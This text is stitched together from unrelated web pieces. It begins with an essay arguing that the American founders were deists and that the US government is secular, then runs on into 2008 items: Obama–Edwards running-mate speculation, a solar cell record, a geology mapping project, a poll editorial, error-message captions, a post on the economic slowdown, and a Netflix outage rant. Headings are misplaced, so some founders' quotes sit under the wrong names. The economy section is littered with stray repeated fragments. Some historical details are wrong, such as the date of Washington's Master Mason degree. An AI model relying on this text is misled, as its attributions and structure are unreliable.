Masonry welcomed anyone from any religion or non-religion , as long as they believed in a Supreme Being .
Washington , Franklin , Hancock , Hamilton , Lafayette , and many others accepted Freemasonry .
Treaty of Tripoli
The Constitution reflects our founders views of a secular government , protecting the freedom of any belief or unbelief .
The historian , Robert Middlekauff , observed , " the idea that the Constitution expressed a moral view seems absurd .
There were no genuine evangelicals in the Convention , and there were no heated declarations of Christian piety . "
George Washington
Much of the myth of Washington 's alleged Christianity came from Mason Weems influential book , " Life of Washington . "
The story of the cherry tree comes from this book and it has no historical basis .
Weems , a Christian minister portrayed Washington as a devout Christian , yet Washington 's own diaries show that he rarely attended Church .
Washington revealed almost nothing to indicate his spiritual frame of mind , hardly a mark of a devout Christian .
In his thousands of letters , the name of Jesus Christ never appears .
He rarely spoke about his religion , but his Freemasonry experience points to a belief in deism .
Washington 's initiation occurred at the Fredericksburg Lodge on 4 November 1752 , later becoming a Master mason in 1799 , and remained a freemason until he died .
To the United Baptist Churches in Virginia in May , 1789 , Washington said that every man " ought to be protected in worshipping the Deity according to the dictates of his own conscience . "
Thomas Jefferson
After Washington 's death , Dr. Abercrombie , a friend of his , replied to a Dr. Wilson , who had interrogated him about Washington 's religion replied , " Sir , Washington was a Deist .
" Even most Christians do not consider Jefferson a Christian .
In many of his letters , he denounced the superstitions of Christianity .
He did not believe in spiritual souls , angels or godly miracles .
Although Jefferson did admire the morality of Jesus , Jefferson did not think him divine , nor did he believe in the Trinity or the miracles of Jesus .
In a letter to Peter Carr , 10 August 1787 , he wrote , " Question with boldness even the existence of a god . "
Jefferson believed in materialism , reason , and science .
He never admitted to any religion but his own .
In a letter to Ezra Stiles Ely , 25 June 1819 , he wrote , " You say you are a Calvinist .
I am not .
I am of a sect by myself , as far as I know . "
John Adams
John Adams
Adams , a Unitarian , flatly denied the doctrine of eternal damnation .
In a letter to Thomas Jefferson , he wrote :
" I almost shudder at the thought of alluding to the most fatal example of the abuses of grief which the history of mankind has preserved -- the Cross .
Consider what calamities that engine of grief has produced ! "
In his letter to Samuel Miller , 8 July 1820 , Adams admitted his unbelief of Protestant Calvinism : " I must acknowledge that I cannot class myself under that denomination . "
In his , " A Defence of the Constitutions of Government of the United States of America " [ 1787-1788 ] , John Adams wrote :
James Madison
Benjamin Franklin
" The United States of America have exhibited , perhaps , the first example of governments erected on the simple principles of nature ; and if men are now sufficiently enlightened to disabuse themselves of artifice , imposture , hypocrisy , and superstition , they will consider this event as an era in their history .
Although the detail of the formation of the American governments is at present little known or regarded either in Europe or in America , it may hereafter become an object of curiosity .
It will never be pretended that any persons employed in that service had interviews with the gods , or were in any degree under the influence of Heaven , more than those at work upon ships or houses , or laboring in merchandise or agriculture ; it will forever be acknowledged that these governments were contrived merely by the use of reason and the senses .
" . . .
Thirteen governments [ of the original states ] thus founded on the natural authority of the people alone , without a pretence of miracle or mystery , and which are destined to spread over the northern part of that whole quarter of the globe , are a great point gained in favor of the rights of mankind .
" Called the father of the Constitution , Madison had no conventional sense of Christianity .
In 1785 , Madison wrote in his Memorial and Remonstrance against Religious Assessments : " During almost fifteen centuries has the legal establishment of Christianity been on trial .
What have been its fruits ?
More or less in all places , pride and indolence in the Clergy , ignorance and servility in the laity ; in both , superstition , bigotry and persecution . "
" What influence , in fact , have ecclesiastical establishments had on society ?
In some instances they have been seen to erect a spiritual tyranny on the ruins of the civil authority ; on many instances they have been seen upholding the thrones of political tyranny ; in no instance have they been the guardians of the liberties of the people .
Rulers who wish to subvert the public liberty may have found an established clergy convenient auxiliaries .
A just government , instituted to secure and perpetuate it , needs them not .
" Although Franklin received religious training , his nature forced him to rebel against the irrational tenets of his parents Christianity .
His Autobiography revels his skepticism , " My parents had given me betimes religions impressions , and I received from my infancy a pious education in the principles of Calvinism .
But scarcely was I arrived at fifteen years of age , when , after having doubted in turn of different tenets , according as I found them combated in the different books that I read , I began to doubt of Revelation itself . " . . .
Some books against Deism fell into my hands .
. .
It happened that they wrought an effect on my quite contrary to what was intended by them ; for the arguments of the Deists , which were quoted to be refuted , appeared to me much stronger than the refutations ; in short , I soon became a through Deist . "
In an essay on " Toleration , " Franklin wrote :
" If we look back into history for the character of the present sects in Christianity , we shall find few that have not in their turns been persecutors , and complainers of persecution .
The primitive Christians thought persecution extremely wrong in the Pagans , but practiced it on one another .
The first Protestants of the Church of England blamed persecution in the Romish church , but practiced it upon the Puritans .
These found it wrong in the Bishops , but fell into the same practice themselves both here [ England ] and in New England . "
Dr. Priestley , an intimate friend of Franklin , wrote of him :
" It is much to be lamented that a man of Franklin 's general good character and great influence should have been an unbeliever in Christianity , and also have done as much as he did to make others unbelievers " ( Priestley 's Autobiography )
Thomas Paine
This freethinker and author of several books , influenced more early Americans than any other writer .
Although he held Deist beliefs , he wrote in his famous The Age of Reason :
" I do not believe in the creed professed by the Jewish church , by the Roman church , by the Greek church , by the Protestant church , nor by any church that I know of .
My own mind is my church . "
" Of all the systems of religion that ever were invented , there is no more derogatory to the Almighty , more unedifiying to man , more repugnant to reason , and more contradictory to itself than this thing called Christianity . "
The U.S. Constitution
The most convincing evidence that our government did not ground itself upon Christianity comes from the very document that defines it -- the United States Constitution .
If indeed our Framers had aimed to found a Christian republic , it would seem highly unlikely that they would have forgotten to leave out their Christian intentions in the Supreme law of the land .
In fact , nowhere in the Constitution do we have a single mention of Christianity , God , Jesus , or any Supreme Being .
There occurs only two references to religion and they both use exclusionary wording .
The 1st Amendment 's says , " Congress shall make no law respecting an establishment of religion .
. . " and in Article VI , Section 3 , " . . . no religious test shall ever be required as a qualification to any office or public trust under the United States . "
Thomas Jefferson interpreted the 1st Amendment in his famous letter to the Danbury Baptist Association in January 1 , 1802 :
" I contemplate with sovereign reverence that act of the whole American people which declared that their legislature should ' make no law respecting an establishment of religion , or prohibiting the free exercise thereof , ' thus building a wall of separation between church and State . "
Some Religious activists try to extricate the concept of separation between church and State by claiming that those words do not occur in the Constitution .
Indeed they do not , but neither does it exactly say " freedom of religion , " yet the First Amendment implies both .
As Thomas Jefferson wrote in his Autobiography , in reference to the Virginia Act for Religious Freedom :
" Where the preamble declares , that coercion is a departure from the plan of the holy author of our religion , an amendment was proposed by inserting " Jesus Christ , " so that it would read " A departure from the plan of Jesus Christ , the holy author of our religion ; " the insertion was rejected by the great majority , in proof that they meant to comprehend , within the mantle of its protection , the Jew and the Gentile , the Christian and Mohammedan , the Hindoo and Infidel of every denomination . "
James Madison , perhaps the greatest supporter for separation of church and State , and whom many refer to as the father of the Constitution , also held similar views which he expressed in his letter to Edward Livingston , 10 July 1822 :
" And I have no doubt that every new example will succeed , as every past one has done , in shewing that religion & Govt will both exist in greater purity , the less they are mixed together . "
Today , if ever our government needed proof that the separation of church and State works to ensure the freedom of religion , one only need to look at the plethora of Churches , temples , and shrines that exist in the cities and towns throughout the United States .
Only a secular government , divorced from religion could possibly allow such tolerant diversity .
The Declaration of Independence
Many Christians who think of America as founded upon Christianity usually present the Declaration as " proof . "
The reason appears obvious : the document mentions God .
However , the God in the Declaration does not describe Christianity 's God .
It describes " the Laws of Nature and of Nature 's God . "
This nature 's view of God agrees with deist philosophy but any attempt to use the Declaration as a support for Christianity will fail for this reason alone .
Article XI from the Treaty of Tripoli Article XI from the Treaty of Tripoli Article XI from the Treaty of Tripoli
More significantly , the Declaration does not represent the law of the land as it came before the Constitution .
The Declaration aimed at announcing their separation from Great Britain and listed the various grievances with the " thirteen united States of America . "
The grievances against Great Britain no longer hold , and we have more than thirteen states .
Today , the Declaration represents an important historical document about rebellious intentions against Great Britain at a time before the formation of our independent government .
Although the Declaration may have influential power , it may inspire the lofty thoughts of poets , and judges may mention it in their summations , it holds no legal power today .
Our presidents , judges and policemen must take an oath to uphold the Constitution , but never to the Declaration of Independence .
Of course the Declaration depicts a great political document , as it aimed at a future government upheld by citizens instead of a religious monarchy .
It observed that all men " are created equal " meaning that we all come inborn with the abilities of life , liberty and the pursuit of happiness .
That " to secure these rights , governments are instituted among men . "
The Declaration says nothing about our rights secured by Christianity , nor does it imply anything about a Christian foundation .
Treaty of Tripoli
Unlike governments of the past , the American Fathers set up a government divorced from religion .
The establishment of a secular government did not require a reflection to themselves about its origin ; they knew this as an unspoken given .
However , as the U.S. delved into international affairs , few foreign nations knew about the intentions of America .
For this reason , an insight from at a little known but legal document written in the late 1700s explicitly reveals the secular nature of the United States to a foreign nation .
Officially called the " Treaty of peace and friendship between the United States of America and the Bey and Subjects of Tripoli , of Barbary , " most refer to it as simply the Treaty of Tripoli .
In Article 11 , it states :
Joel Barlow , U.S. Consul General of Algiers Joel Barlow , U.S. Consul General of Algiers Copyright National Portait Gallery Smithsonian Institution / Art Resource NY Joel Barlow , U.S. Consul General of Algiers
" As the Government of the United States of America is not in any sense founded on the Christian religion ; as it has in itself no character of enmity against the laws , religion , or tranquillity , of Musselmen ; and as the said States never have entered into any war or act of hostility against any Mehomitan nation , it is declared by the parties that no pretext arising from religious opinions shall ever produce an interruption of the harmony existing between the two countries . "
The preliminary treaty began with a signing on 4 November , 1796 ( the end of George Washington 's last term as president ) .
Joel Barlow , the American diplomat served as counsel to Algiers and held responsibility for the treaty negotiations .
Barlow had once served under Washington as a chaplain in the revolutionary army .
He became good friends with Paine , Jefferson , and read Enlightenment literature .
Later he abandoned Christian orthodoxy for rationalism and became an advocate of secular government .
Barlow , along with his associate , Captain Richard O'Brien , et al , translated and modified the Arabic version of the treaty into English .
From this came the added Amendment 11 .
Barlow forwarded the treaty to U.S. legislators for approval in 1797 .
Timothy Pickering , the secretary of state , endorsed it and John Adams concurred ( now during his presidency ) , sending the document on to the Senate .
The Senate approved the treaty on June 7 , 1797 , and officially ratified by the Senate with John Adams signature on 10 June , 1797 .
All during this multi-review process , the wording of Article 11 never raised the slightest concern .
The treaty even became public through its publication in The Philadelphia Gazette on 17 June 1797 .
So here we have a clear admission by the United States that our government did not found itself upon Christianity .
Unlike the Declaration of Independence , this treaty represented U.S. law as all treaties do according to the Constitution ( see Article VI , Sect. 2 ) .
Although the Christian exclusionary wording in the Treaty of Tripoli only lasted for eight years and no longer has legal status , it clearly represented the feelings of our Founding Fathers at the beginning of the U.S. government .
Common Law
Signers of the Treaty of Tripoli Signers of the Treaty of Tripoli Signers of the Treaty of Tripoli
According to the Constitution 's 7th Amendment : " In suits at common law . . . the right of trial by jury shall be preserved ; and no fact , tried by a jury , shall be otherwise re-examined in any court of the United States than according to the rules of the common law . "
Here , many Christians believe that common law came from Christian foundations and therefore the Constitution derives from it .
They use various quotes from Supreme Court Justices proclaiming that Christianity came as part of the laws of England , and therefore from its common law heritage .
But one of our principle Founding Fathers , Thomas Jefferson , elaborated about the history of common law in his letter to Thomas Cooper on February 10 , 1814 :
" For we know that the common law is that system of law which was introduced by the Saxons on their settlement in England , and altered from time to time by proper legislative authority from that time to the date of Magna Charta , which terminates the period of the common law .
. .
This settlement took place about the middle of the fifth century .
But Christianity was not introduced till the seventh century ; the conversion of the first christian king of the Heptarchy having taken place about the year 598 , and that of the last about 686 .
Here then , was a space of two hundred years , during which the common law was in existence , and Christianity no part of it .
" . . . if any one chooses to build a doctrine on any law of that period , supposed to have been lost , it is incumbent on him to prove it to have existed , and what were its contents .
These were so far alterations of the common law , and became themselves a part of it .
But none of these adopt Christianity as a part of the common law .
If , therefore , from the settlement of the Saxons to the introduction of Christianity among them , that system of religion could not be a part of the common law , because they were not yet Christians , and if , having their laws from that period to the close of the common law , we are all able to find among them no such act of adoption , we may safely affirm ( though contradicted by all the judges and writers on earth ) that Christianity neither is , nor ever was a part of the common law . "
In the same letter , Jefferson examined how the error spread about Christianity and common law .
Jefferson realized that a misinterpretation had occurred with a Latin term by Prisot , " * ancien scripture * , " in reference to common law history .
The term meant " ancient scripture " but people had incorrectly interpreted it to mean " Holy Scripture , " thus spreading the myth that common law came from the Bible .
Jefferson writes :
" And Blackstone repeats , in the words of Sir Matthew Hale , that ' Christianity is part of the laws of England , ' citing Ventris and Strange ubi surpa .
4 . Blackst. 59 . Lord Mansfield qualifies it a little by saying that ' The essential principles of revealed religion are part of the common law . "
In the case of the Chamberlain of London v. Evans , 1767 .
But he cites no authority , and leaves us at our peril to find out what , in the opinion of the judge , and according to the measure of his foot or his faith , are those essential principles of revealed religion obligatory on us as a part of the common law . "
Thus we find this string of authorities , when examined to the beginning , all hanging on the same hook , a perverted expression of Priscot 's , or on one another , or nobody . "
The Encyclopedia Britannica , also describes the Saxon origin and adds : " The nature of the new common law was at first much influenced by the principles of Roman law , but later it developed more and more along independent lines . "
Also prominent among the characteristics that derived out of common law include the institution of the jury , and the right to speedy trial .
Christian Sources
Virtually all the evidence that attempts to connect a foundation of Christianity upon the government rests mainly on quotes and opinions from a few of the colonial statesmen who had professed a belief in Christianity .
Sometimes the quotes come from their youth before their introduction to Enlightenment ideas or simply from personal beliefs .
But statements of beliefs , by themselves , say nothing about Christianity as the source of the U.S. government .
There did occur , however , some who wished a connection between church and State .
Patrick Henry , for example , proposed a tax to help sustain " some form of Christian worship " for the state of Virginia .
But Jefferson and other statesmen did not agree .
In 1779 , Jefferson introduced a bill for the Statute for Religious Freedom which became Virginia law .
Jefferson designed this law to completely separate religion from government .
None of Henry 's Christian views ever got introduced into Virginia 's or U.S. Government law .
Unfortunately , later developments in our government have clouded early history .
The original Pledge of Allegiance , authored by Francis Bellamy in 1892 did not contain the words " under God . "
Not until June 1954 did those words appear in the Allegiance .
The United States currency never had " In God We Trust " printed on money until after the Civil War .
Many Christians who visit historical monuments and see the word " God " inscribed in stone , automatically impart their own personal God of Christianity , without understanding the Framers Deist context .
In the Supreme Court 's 1892 Holy Trinity Church vs. United States , Justice David Brewer wrote that " this is a Christian nation . "
Many Christians use this as evidence .
However , Brewer wrote this in dicta , as a personal opinion only and does not serve as a legal pronouncement .
Later Brewer felt obliged to explain himself : " But in what sense can [ the United States ] be called a Christian nation ?
Not in the sense that Christianity is the established religion or the people are compelled in any manner to support it .
On the contrary , the Constitution specifically provides that ' Congress shall make no law respecting an establishment of religion or prohibiting the free exercise thereof . '
Neither is it Christian in the sense that all its citizens are either in fact or in name Christians .
On the contrary , all religions have free scope within its borders .
Numbers of our people profess other religions , and many reject all . "
Conclusion
The Framers derived an independent government out of Enlightenment thinking against the grievances caused by Great Britain .
Our Founders paid little heed to political beliefs about Christianity .
The 1st Amendment stands as the bulkhead against an establishment of religion and at the same time insures the free expression of any belief .
The Treaty of Tripoli , an instrument of the Constitution , clearly stated our non-Christian foundation .
We inherited common law from Great Britain which derived from pre-Christian Saxons rather than from Biblical scripture .
Today we have powerful Christian organizations who work to spread historical myths about early America and attempt to bring a Christian theocracy to the government .
If this ever happens , then indeed , we will have ignored the lessons from history .
Fortunately , most liberal Christians today agree with the principles of separation of church and State , just as they did in early America .
" They all attributed the peaceful dominion of religion in their country mainly to the separation of church and state .
I do not hesitate to affirm that during my stay in America I did not meet a single individual , of the clergy or the laity , who was not of the same opinion on this point "
Bibliography
- Alexis de Tocqueville , Democracy in America , 1835
Borden , Morton , " Jews , Turks , and Infidels , " The University of North Carolina Press , 1984
Boston , Robert , " Why the Religious Right is Wrong About Separation of Church & State , " Prometheus Books , 1993
Boston , F. Andrews , et al , " The Writings of George Washington , " ( 12 Vols. ) , Charleston , S.C. , 1833-37
Fitzpatrick , John C. , ed. , " The Diaries of George Washington , 1748 - 1799 , " Houghton Mifflin Company : Published for the Mount Vernon Ladies Association of the Union , 1925
Gay , Kathlyn , " Church and State , " The Millbrook Press , " 1992
Handy , Robert , T. , " A History of the Churches in U.S. and Canada , " New York : Oxford University Press , 1977
Hayes , Judith , " All those Christian Presidents , " [ The American Rationalist , March / April 1997 ]
Kock , Adrienne , ed. , " The American Enlightenment : The Shaping of the American Experiment and a Free Society , " New York : George Braziller , 1965
Mapp , Jr , Alf J. , " Thomas Jefferson , " Madison Books , 1987
Middlekauff , Robert , " The Glorious Cause , " Oxford University Press , 1982
Miller , Hunter , ed. , " Treaties and other International Acts of the United States of America , " Vol. 2 , Documents 1- 40 : 1776-1818 , United States Government Printing Office , Washington : 1931
Peterson , Merrill D. , " Thomas Jefferson Writings , " The Library of America , 1984
Remsburg , John E. , " Six Historic Americans , " The Truth Seeker Company , New York
Robinson , John J. , " Born in Blood , " M. Evans & Company , New York , 1989
Roche , O.I.A. , ed , " The Jefferson Bible : with the Annotated Commentaries on Religion of Thomas Jefferson , " Clarkson N. Potter , Inc. , 1964
Seldes , George , ed. , " The Great Quotations , " Pocket Books , New York , 1967
Sweet , William W. , " Revivalism in America , its origin , growth and decline , " C. Scribner 's Sons , New York , 1944
Woodress , James , " A Yankee 's Odyssey , the Life of Joel Barlow , " J. P. Lippincott Co. , 1958
Encyclopedia sources :
Common law : Encyclopedia Britannica , Vol. 6 , " William Benton , Publisher , 1969
Declaration of Independence : MicroSoft Encarta 1996 Encyclopedia , MicroSoft Corp. , Funk & Wagnalls Corporation .
In God We Trust : MicroSoft Encarta 1996 Encyclopedia , MicroSoft Corp. , Funk & Wagnalls Corporation .
Pledge of Allegiance : Academic American Encyclopedia , Vol. 15 , Grolier Incorporated , Danbury , Conn. , 1988
Special thanks to Ed Buckner , Robert Boston , Selena Brewington and Lion G. Miles , for help in providing me with source materials .
Advertisements
Of all the potential running mates mentioned for Obama , John Edwards is the most well known .
Despite his notoriety , this edition of Pros and Cons will look at the prospects for an Obama / Edwards ticket .
Resume : John Edwards was born in South Carolina , but spent most of his childhood in North Carolina .
He earned his bachelor ’s degree from North Carolina State University , and his law degree from the University of North Carolina .
Starting in 1984 , Edwards won a series of medical malpractice lawsuits .
In 1985 , Edwards won a precedent setting case in North Carolina for a child born with cerebral palsy because doctors ignored the fetal monitor and did perform a Cesarean section right away .
The case established the liability of doctors and hospitals for not explaining the risks of a medical procedure .
This case brought Edwards national attention .
He started his own law firm in 1993 with friend David Kirby , and won the biggest case of his career in 1997 against Sta - Rite the maker of a defective pool drain cover that disemboweled a five year old girl .
Edwards left law and won a Senate seat in 1998 .
In the Senate , Edwards co-sponsored 203 bills , and was the man charge of deposing witnesses Monica Lewinsky and Vernon Jordan for the impeachment trial of Bill Clinton .
Advertisements
Edwards became nationally known as a politician during his 2004 presidential campaign , where he finished second to eventual Democratic nominee John Kerry and was later selected as Kerry ’s running mate .
Edwards ran for president again in 2008 , but he was n’t able to financially compete with Sens. Hillary Clinton and Barack Obama .
Except for a second place finish in Iowa , Edwards finished a distant third everywhere else .
Out of money , and having no momentum , he ended his presidential campaign on January 30 , 2008 .
Pros to Obama Picking Edwards : Edwards has managed to reshape himself as a blue collar economic populist .
Looking back at his 2008 primary campaign , one can see that Edwards ’s focus on the economy , healthcare , and poverty was ahead of the curve .
His base of support is white men .
This is the only demographic that Obama trails John McCain with .
Edwards would help Obama in states like Michigan , Ohio , and Pennsylvania where the economy is the number one concern .
He is an experienced national campaigner who would bring real star power to the ticket .
For many Democrats , Obama / Edwards are the real dream ticket .
Cons to Obama Picking Edwards : John Edwards was unable to catch fire with Democratic voters in 2008 , this along with the fact that he was on the national ticket in 2004 raises a question about Edwards being damaged goods ?
Edwards ’s critics have labeled him a pretty boy elitist .
The charges of elitism are something that Obama has been battling since the Pennsylvania primary , and the selection of Edwards could make it a central attack of the fall campaign .
Edwards has apologized for his vote in favor of the Iraq war , but he also voted for the Patriot Act .
He lacks foreign policy experience , and having only served one term in the Senate , experience in general .
Odds of Obama Choosing Edwards :
The odds are pretty strong that Obama could select Edwards .
He is one of the few names that are known to be on Obama ’s short list .
The decision on Edwards probably comes down to whether or not the campaign feels like they need a running mate that will boost Obama ’s credibility with foreign policy .
If they decide that foreign policy experience is a must , then Edwards will not be chosen .
I think he is definitely in Obama ’s top 5 , and maybe even his top 3 .
If Edwards is n’t chosen , and Obama goes on to victory , it is a virtual lock that he will be the next Attorney General of the United States .
The Choice - O - Meter says :
( OOOOOOO ) 7 Os for John Edwards
1 O = No Chance – 10 O’s = A Sure Thing
Lab Sets Record for Solar Cell Efficiency
August 13th , 2008 by Ariel Schwartz
The National Renewable Energy Laboratory in the United States has announced that a new device developed by its scientists can convert 40.8 percent of light that hits it into electricity .
This bests the previous record of 40.7 percent set by a different organization .
According to NREL spokesman George Douglas , the new device is both thinner and lighter than the previous model , which used a germanium wafer .
This solar cell , however , uses gallium indium phosphide and gallium indium arsenide to split light into 3 parts , each of which are then absorbed by the cell ’s 3 layers .
The lab says that the new solar cell is an excellent candidate for concentrated photovoltaic arrays as well as space satellites .
While I have n’t seen anything mentioned about possible pricing , I can only assume that this technology will be unaffordable for most businesses and individuals for a long time to come .
Posts Related to Solar Energy :
Appreciate CleanTechnica ’s originality ?
Consider becoming a CleanTechnica member , supporter , or ambassador — or a patron on Patreon .
Sign up for our free daily newsletter or weekly newsletter to never miss a story .
Have a tip for CleanTechnica , want to advertise , or want to suggest a guest for our CleanTech Talk podcast ?
Contact us here .
Latest Cleantech Talk Episode
Have you ever wondered what our world would look like stripped bare of all plants , soils , water and man-made structures ?
Well wonder no longer ; images of the Earth as never seen before have been unveiled in what is the world ’s biggest geological mapping project ever .
Earth and computer scientists from 79 nations are working together on a global project called OneGeology to produce the first digital geological map of the world .
This project is doing the same for the rocks beneath our feet that Google does for maps of the Earth ’s surface .
These scientists have achieved their goal in just over one year after initiating this global project .
For a science that usually counts time in millions of years , this is no mean feat !
OneGeology is supported by UNESCO and six other international umbrella bodies and is the flagship project for UN International Year of Planet Earth 2008 .
The key results of this project are :
Geological maps from around the globe are accessible on the World Wide Web ;
A new web language has been written for geology which allows nations to share data with each other and the public ;
The know - how to do this is being exchanged so that all nations across the world , regardless of their development status , can take part and benefit .
Explaining the significance of this project , Ian Jackson , Chief of Operations at the British Geological Survey , who is coordinating OneGeology explained : “ Geological maps are essential tools in finding natural resources e.g. water , hydrocarbons and minerals , and when planning to mitigate geohazards e.g. earthquakes , volcanoes and radon .
Natural resources are a crucial source of wealth for all nations , especially those that need to develop and build their economies .
Identifying geohazards is often a matter of life or death .
Other challenges facing all nations in the 21st century include rising sea levels , management of waste ( nuclear or domestic ) and storage of carbon .
Knowledge of the rocks that we all live on has become increasingly important and sharing that knowledge at a time of global environmental change is crucial ” .
François Robida , Deputy Head of Division , Information Systems and Technologies at the Bureau de Recherches Géologiques et Minières , France , explained ; “ Today you can go to the OneGeology website and get geological maps from across the globe — from an overview of our entire planet , to larger scale maps of the rocks of individual nations .
You also have the ability to hop from this web site to higher resolution applied maps and data on linked national web sites .
Participating nations are contributing to a legacy for humankind ; by acting locally they are thinking globally ” .
Unfortunately information about the Earth ’s rocks is n’t always up - to - date , joined - up , and in some parts of the world is not available at all !
This was the challenge that OneGeology project set out to tackle and these scientists will be unveiling the the result of their work at the 33rd International Geological Congress in Oslo , Norway on 6 August 2008 .
On the web : http://www.onegeology.org/
Even many Americans sympathetic to gay rights will be startled by a new Zogby International poll indicating that more than 60 % of registered voters would support a qualified gay candidate for the presidency .
Romantic as it may be , the notion that anyone can grow up to be president long has served as a metaphor for the openness and fairness of American society .
It is thus remarkable , and reassuring , that nearly two - thirds of respondents in the poll expressed a willingness to discard one of the oldest and most pervasive prejudices when they enter the voting booth .
Zogby ’s findings do n’t come entirely out of the blue .
Last year , a Gallup poll asked respondents whether they would vote for a presidential candidate who was gay .
Fifty - five percent answered yes ( compared with only 45 % who would support an atheist candidate ) .
Critics of such polls will argue that they reflect a homophobic version of the Bradley Effect -- named for former Los Angeles Mayor Tom Bradley -- in which racist voters lie about their willingness to vote for a black candidate .
But even if some respondents say they will vote for a gay candidate for fear of seeming politically incorrect , that is itself a comment on how far gays and lesbians have come .
Polls about the acceptability of a gay presidential candidate reflect a larger trend in support for gay equality .
In a Field poll conducted shortly after the California Supreme Court ’s same - sex marriage ruling in May , 51 % of registered California voters favored allowing gay and lesbian couples to marry .
Another Field poll released last month found that by a 51 % - to - 42 % margin , California voters opposed Proposition 8 , which would amend the state Constitution to overturn the high court ’s decision .
Advertisement
With same - sex marriage , as with gay rights generally , the younger generation is leading the way .
Last month ’s Field poll found that opposition to Proposition 8 was greatest among voters under 30 years of age .
That was consistent with a finding by the Pew Forum on Religion and Public Life that roughly half of adults under 30 supported same - sex marriage .
The trend is clear : Support for gay rights and same - sex marriage is being driven by generational change .
But differences among age groups cannot completely explain the greater tolerance for gays and lesbians .
Thanks to the gay - rights movement , Americans of all ages are likelier to have openly homosexual relatives , neighbors and co-workers .
Those personal contacts make it harder for decent people to accept discrimination against gays and lesbians -- including at the ballot box .
" I took this picture from my cell phone at the Wendy 's drive - thru , " Chris Jones noted .
" Somehow , the total still came out correct . "
" I found this helpful text while setting up my firewall , " wrote Jonathan , " it was n't really what I expected . "
" This popped up for me on 1and1. com 's webmail login , " Jess said , " I suspect this could make for a rather interesting tech support call ... "
Aaron Smith received this highly informative error message ...
Frej Bjon wrote , " either the jet streams were unusually brisk that day , or this highly regular MD - 11 just decided to go supersonic ... for almost the entire flight . "
" I got this rather peculiar warning dialog , " Iain wrote , " I 'm not really sure if the file ( files ? ) were renamed correctly , so any help would be appreciated . "
The global economy is slowing rapidly .
Let 's take a look at some striking examples .
Germany , France , Spain , Italy
Bloomberg is reporting German , French Economies Shrink as Spending , Investment Falter .
Germany and France , the euro area's two largest economies , contracted in the second quarter as faltering sales undermined investment by companies and soaring costs eroded consumer spending power .
German gross domestic product fell a seasonally adjusted 0.5 percent from the first quarter .
French GDP declined 0.3 percent , reversing a 0.4 percent gain in the previous three - month period .
Spain 's economy grew at the slowest pace since a 1993 recession in the second quarter as the country 's once - booming construction industry slumped .
Italy 's economy , the third - biggest in the euro region , unexpectedly shrank in the April - June period , edging closer to a fourth recession in a decade .
An index measuring the economic climate in the euro region dropped to the lowest since 1993 , the Munich - based Ifo institute said yesterday .
Measures of both current conditions and expectations declined , according to institute 's quarterly World Economic Survey .
Japan Economy Shrinks 2.4 %
Japan 's economy contracted last quarter , bringing the country to the brink of its first recession in six years , as exports fell and consumers spent less .
Gross domestic product shrank an annualized 2.4 percent in the three months ended June 30 after expanding 3.2 percent in the first quarter , the Cabinet Office said today in Tokyo .
The Nikkei 225 Stock Average fell the most in a month .
Exports fell the most since the 2001 - 2002 recession , robbing Japan of the engine that drove its longest postwar expansion , while record fuel and food prices deterred spending at home .
Sharp Slowdown
In Australia
The RBA predicts that Australia 's annual rate of jobs growth , at present 2.3 % , will slow to three - quarters of 1 % almost straight away .
The forecast implies a jump in unemployment from 4.3 % to 6 % by the end of next year .
Westpac chief economist Bill Evans said the Reserve Bank seemed to be " shocked " by the severity of the slowdown that it had helped engineer .
Associate Professor Steve Keen from the University of Western Sydney says Brace yourselves for recession in this interview with Phillip Lasker .
New Zealand Recession Fears
Alan Bollard , governor of the Reserve Bank of New Zealand , cut the rate from 8.25 per cent to 8 per cent - still the highest in the industrialised world after Iceland - despite rising inflation , forecast to peak at 5 per cent by September .
Economists said the New Zealand authorities were acting aggressively and taking a gamble in looking through the worsening inflation picture and cutting rates to prevent the economy weakening further .
The move surprised many as it contradicts the Reserve Bank 's mandate , which states that achieving and maintaining price stability are the sole objectives of monetary policy .
The central bank 's stated inflation target band is 1 to 3 per cent .
Economic Chill In The U.K .
The U.K. pound traded near its lowest level in 22 months against the dollar after the Bank of England cut its economic - growth forecast yesterday , signaling it may reduce interest rates .
Bank of England Governor Mervyn King said yesterday he saw a " chill in the economic air " after unemployment climbed in July by the most in almost 16 years .
The pound has lost 5.8 percent against the dollar in the past 10 days , more than any other major currency except the South African rand and Australian dollar .
The pound fell yesterday by the most in nine months .
" The central bank has effectively opened the door for an interest - rate cut , possibly as soon as next month , " Lee Ferridge , a foreign - exchange strategist in London at State Street Global Markets , a unit of the world 's largest money manager for institutions , wrote in an e-mailed note to clients today .
" Sterling has obviously reacted significantly to this . "
Perfectly Obvious
Sterling has obviously reacted significantly to this .
Currency Intervention vs. Fundamentals
I use the term " ignited " the rally .
I agree the dollar was oversold , and a rally can occur at any time .
But usually a market does n't rally unless there is some news event or some fundamental change that causes the market to reverse course .
The Fundamental Change
" But usually a market does n't rally ... "
But usually a market does n't have a sustainable rally unless there is some news event or some fundamental change that causes the market to reverse course .
fundamental change
There has not been any news exceptionally favorable to the dollar .
....
So what happened to cause the dollar to rally over the past three weeks ?
In a word , intervention .
fundamental change
cause
British Pound vs. US Dollar
Euro vs. US Dollar
Fundamentals Now Perfectly Clear In Hindsight
The Implications Looking Ahead
ignited
To Scroll Thru My Recent Post List
Photo [ Brymo / Flickr ]
Come on , internet .
Just bring us proper movie streaming already .
If any more proof were needed that physical media needs to go , and soon , we bring you exhibit A : The Netflix Outage .
The DVD - by - post service collapsed last week , leaving a morass of confusion in its wake .
And the worst of it is that Netflix does n't appear to know what went wrong .
Fully one third of Netflix customers are not being shipped DVDs .
Those affected should have received an email offering credit , but confusingly , some people who did receive the mails have also been receiving deliveries .
We 're sure it will get sorted out , but it shows that , even if the glitch is in the Netflix computer systems , shipping movies by post is an old - world way of doing things .
With just about everything internet enabled these days , there 's no technical excuse not to ditch plastic disks entirely and move to downloads .
Sadly , our iPhones , laptops and games consoles are being starved of content due to greed .
Sure , Netflix offers a streaming service ( which is still up and running just fine ) , and iPod owners have the iTunes Store for movies and TV , but choice is limited .
We need a range of services that offer everything , not just movies from one studio , but all movies ever released .
We want the back catalogs of the music studios online , and we want to buy ebooks for less than the cost of the paper versions , and at the same time they are available in the shops .
And we want them on all our devices .
As a Mac and iPod user , I 'd be happy to use iTunes as my TV station and video store , but I can't get movies or TV shows yet in Spain .
I ca n't use Hulu ( I 'm not in the States ) nor Netflix streaming ( the same reason ) .
Obviously this is a negotiation issue : copyright owners need to do deals with the online stores in every country .
But the studios and labels ( and soon , no doubt , book publishers ) are making it hard and generally screwing things up for themselves as well as us .
Imagine this :
You have an iPhone , or an Android phone , or any other smart phone .
